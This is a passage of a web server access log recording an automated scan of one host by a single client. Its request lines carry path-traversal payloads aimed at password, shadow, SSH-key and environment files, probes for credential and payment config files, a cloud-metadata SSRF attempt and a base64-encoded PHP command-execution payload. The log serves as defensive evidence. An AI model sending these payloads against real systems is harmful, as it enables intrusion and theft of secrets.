+[21/Jan/2026:01:24:58 +0000] - 404 404 - GET https nas.profibot.hu "/config/web3.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - 404 404 - GET https nas.profibot.hu "/payment/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - - 403 - GET https nas.profibot.hu "/?content=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - - 400 - GET https nas.profibot.hu "-" [Client 185.177.72.49] [Length 154] [Gzip -] [Sent-to ] "-" "-" +[21/Jan/2026:01:24:59 +0000] - 404 404 - GET https nas.profibot.hu "/env.local" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - - 403 - GET https nas.profibot.hu "/?page=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - 404 404 - GET https nas.profibot.hu "/ml/configs/blackbox.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - 403 403 - GET https nas.profibot.hu "/.well-known/metadata.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - 404 404 - GET https nas.profibot.hu "/paytm/env.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - 404 404 - GET https nas.profibot.hu "/modules/login/config.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - - 403 - GET https nas.profibot.hu "/?document=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - 404 404 - GET https nas.profibot.hu "/api/tools/shell" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - 404 404 - GET https nas.profibot.hu "/config/idp.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - 404 404 - GET https nas.profibot.hu "/etc/mail/sendmail.mc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - - 403 - GET https nas.profibot.hu "/?section=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - 404 404 - GET https nas.profibot.hu "/metamask/permissions.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - 404 404 - GET https nas.profibot.hu "/tls/policy/mail.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - - 403 - GET https nas.profibot.hu "/?module=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - 404 404 - GET https nas.profibot.hu "/libs/payment/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - 404 404 - GET https nas.profibot.hu "/scada/config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - 404 404 - GET https nas.profibot.hu "/sso/config.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - 404 404 - GET https nas.profibot.hu "/mesos/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - - 403 - GET https nas.profibot.hu "/?lang=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - - 403 - GET https nas.profibot.hu "/?file=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:59 +0000] - 403 403 - GET https nas.profibot.hu "/home/user/.msmtprc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - 404 404 - GET https nas.profibot.hu "/etc/mail/pop3d.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - 404 404 - GET https nas.profibot.hu "/netsuite/integration/smtp.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - 403 403 - GET https nas.profibot.hu "/.docker/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - 404 404 - GET https nas.profibot.hu "/trivy.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - 404 404 - GET https nas.profibot.hu "/paysafecard/config.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - 404 404 - GET https nas.profibot.hu "/hpc/job_template.sh" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - 404 404 - GET https nas.profibot.hu "/wp-content/themes/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - 404 404 - GET https nas.profibot.hu "/fund_holding_config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - 404 404 - GET https nas.profibot.hu "/dashboard" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - 404 404 - GET https nas.profibot.hu "/keycloak/realms/master/export" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - 404 404 - GET https nas.profibot.hu "/config.bak" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - 404 404 - GET https nas.profibot.hu "/config.toml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - 404 404 - GET https nas.profibot.hu "/pubspec.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - 404 404 - GET https nas.profibot.hu "/includes/configure.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - 403 403 - GET https nas.profibot.hu "///////root/.bash_history" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - 404 404 - GET https nas.profibot.hu "/shippo/shipments.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - 404 404 - GET https nas.profibot.hu "/server-status" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - - 403 - GET https nas.profibot.hu "/?template=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - 404 404 - GET https nas.profibot.hu "/newrelic-infra.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - 404 404 - GET https nas.profibot.hu "/administrator/components/com_admin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - - 403 - GET https nas.profibot.hu "/?folder=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - - 403 - GET https nas.profibot.hu "/?layout=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:00 +0000] - - 403 - GET https nas.profibot.hu "/?read=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - 404 404 - GET https nas.profibot.hu "/etc/php.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - 404 404 - GET https nas.profibot.hu "/aws/ses/smtp.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - 404 404 - GET https nas.profibot.hu "/admin/index.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - 404 404 - GET https nas.profibot.hu "/receipts/receipt_template.pdf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - 404 404 - GET https nas.profibot.hu "/c99.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - 404 404 - GET https nas.profibot.hu "/backup.zip" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - - 403 - GET https nas.profibot.hu "/?asset=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - 404 404 - GET https nas.profibot.hu "/preview?title=${7*7}" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - 403 403 - GET https nas.profibot.hu "/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%afroot/.bash_history" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - 404 404 - GET https nas.profibot.hu "/var/log/apache2/error.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - - 403 - GET https nas.profibot.hu "/?action=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - 404 404 - GET https nas.profibot.hu "/mailgun.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - 404 404 - GET https nas.profibot.hu "/modsecurity.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - - 403 - GET https nas.profibot.hu "/?theme=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - 404 404 - GET https nas.profibot.hu "/erp/integration/payment_reconciliation.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - 404 404 - GET https nas.profibot.hu "/clamav/freshclam.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - 403 403 - GET https nas.profibot.hu "/.docker/secrets.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - 404 404 - GET https nas.profibot.hu "/mpi/params.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - 404 404 - GET https nas.profibot.hu "/vpn-config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - - 403 - GET https nas.profibot.hu "/?doc=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - - 403 - GET https nas.profibot.hu "/?img=http://" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - 404 404 - GET https nas.profibot.hu "/app/routes/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:01 +0000] - 404 404 - GET https nas.profibot.hu "/istio/operator.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - 404 404 - GET https nas.profibot.hu "/pages/api/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - - 403 - GET https nas.profibot.hu "/?content=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - 404 404 - GET https nas.profibot.hu "/storage/mail_journals.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - - 403 - GET https nas.profibot.hu "/?inc=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - - 403 - GET https nas.profibot.hu "/?redirect=http://169.254.169.254/" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - 404 404 - GET https nas.profibot.hu "/pos/payment_types.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - 403 403 - GET https nas.profibot.hu "/~/.mbsyncrc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - 404 404 - GET https nas.profibot.hu "/wp-admin/admin-ajax.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - 404 404 - GET https nas.profibot.hu "/snyk.config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - 404 404 - GET https nas.profibot.hu "/mobilepay/env.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - - 403 - GET https nas.profibot.hu "/?view=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - 404 404 - GET https nas.profibot.hu "/alchemy/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - 404 404 - GET https nas.profibot.hu "/keystone/signin" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - 404 404 - GET https nas.profibot.hu "/server-info" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - 404 404 - GET https nas.profibot.hu "/store/digital_uploads/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - 404 404 - GET https nas.profibot.hu "/dash/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - - 403 - GET https nas.profibot.hu "/?doc=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - - 400 - GET https nas.profibot.hu "-" [Client 185.177.72.49] [Length 154] [Gzip -] [Sent-to ] "-" "-" +[21/Jan/2026:01:25:02 +0000] - 404 404 - GET https nas.profibot.hu "/donations/campaign_settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - - 403 - GET https nas.profibot.hu "/?callback=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - - 403 - GET https nas.profibot.hu "/?layout=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - 404 404 - GET https nas.profibot.hu "/src/config/braintree.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:02 +0000] - 404 404 - GET https nas.profibot.hu "/config.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 404 404 - GET https nas.profibot.hu "/contracts/hardhat.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 404 404 - GET https nas.profibot.hu "/attacker/docker-compose.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 404 404 - GET https nas.profibot.hu "/dns/dmarc.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 404 404 - GET https nas.profibot.hu "/xr/vr_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 404 404 - GET https nas.profibot.hu "///////etc/shadow" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 404 404 - GET https nas.profibot.hu "/payment/keys.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 404 404 - GET https nas.profibot.hu "/webroot.bak" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 404 404 - GET https nas.profibot.hu "/env.tmp" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 404 404 - GET https nas.profibot.hu "/cryptomus.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 404 404 - GET https nas.profibot.hu "/gateway/paypal.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 404 404 - GET https nas.profibot.hu "/conf.d/00-default.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 404 404 - GET https nas.profibot.hu "/etc/passwd" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 404 404 - GET https nas.profibot.hu "/neteller/keys.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 404 404 - GET https nas.profibot.hu "/quickbooks/payment_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 404 404 - GET https nas.profibot.hu "/slurm.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - - 403 - GET https nas.profibot.hu "/?navigation=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - - 403 - GET https nas.profibot.hu "/?action=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 404 404 - GET https nas.profibot.hu "/maxmind/geoip.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 403 403 - GET https nas.profibot.hu "/.bamboo.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 403 403 - GET https nas.profibot.hu "/.ssh/id_rsa" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 404 404 - GET https nas.profibot.hu "/manifest.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 404 404 - GET https nas.profibot.hu "/vault/tokens.db" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - - 403 - GET https nas.profibot.hu "/?file=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:03 +0000] - 404 404 - GET https nas.profibot.hu "/appsettings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:04 +0000] - 404 404 - GET https nas.profibot.hu "/src/config/cryptomus.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:04 +0000] - 404 404 - GET https nas.profibot.hu "/config/prod.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:04 +0000] - 404 404 - GET https nas.profibot.hu "/unreal/Config/DefaultEngine.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:04 +0000] - 404 404 - GET https nas.profibot.hu "/typo3/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:04 +0000] - 404 404 - GET https nas.profibot.hu "/zabbix/conf/zabbix.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:04 +0000] - 404 404 - GET https nas.profibot.hu "/test_coverage/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:04 +0000] - 404 404 - GET https nas.profibot.hu "/api/run" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:04 +0000] - - 403 - GET https nas.profibot.hu "/?page=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:04 +0000] - 404 404 - GET https nas.profibot.hu "/META-INF/context.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:04 +0000] - 404 404 - GET https nas.profibot.hu "/react-native.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:04 +0000] - 404 404 - GET https nas.profibot.hu "/package.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:04 +0000] - 200 200 - GET https nas.profibot.hu "/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==" [Client 185.177.72.49] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:04 +0000] - 404 404 - GET https nas.profibot.hu "/screenshots/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:04 +0000] - 404 404 - GET https nas.profibot.hu "/wp-content/plugins/revslider/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:04 +0000] - - 403 - GET https nas.profibot.hu "/?callback=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:04 +0000] - 404 404 - GET https nas.profibot.hu "/invoice_templates/template1.html" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:04 +0000] - - 403 - GET https nas.profibot.hu "/?path=../../../../../../boot.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:04 +0000] - 404 404 - GET https nas.profibot.hu "/ios/Podfile" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:04 +0000] - 404 404 - GET https nas.profibot.hu "/WEB-INF/applicationContext.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:05 +0000] - 200 200 - GET https nas.profibot.hu "/?file=..%2f..%2f..%2fetc%2fpasswd" [Client 185.177.72.49] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:05 +0000] - 404 404 - GET https nas.profibot.hu "/trace/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:05 +0000] - 404 404 - GET https nas.profibot.hu 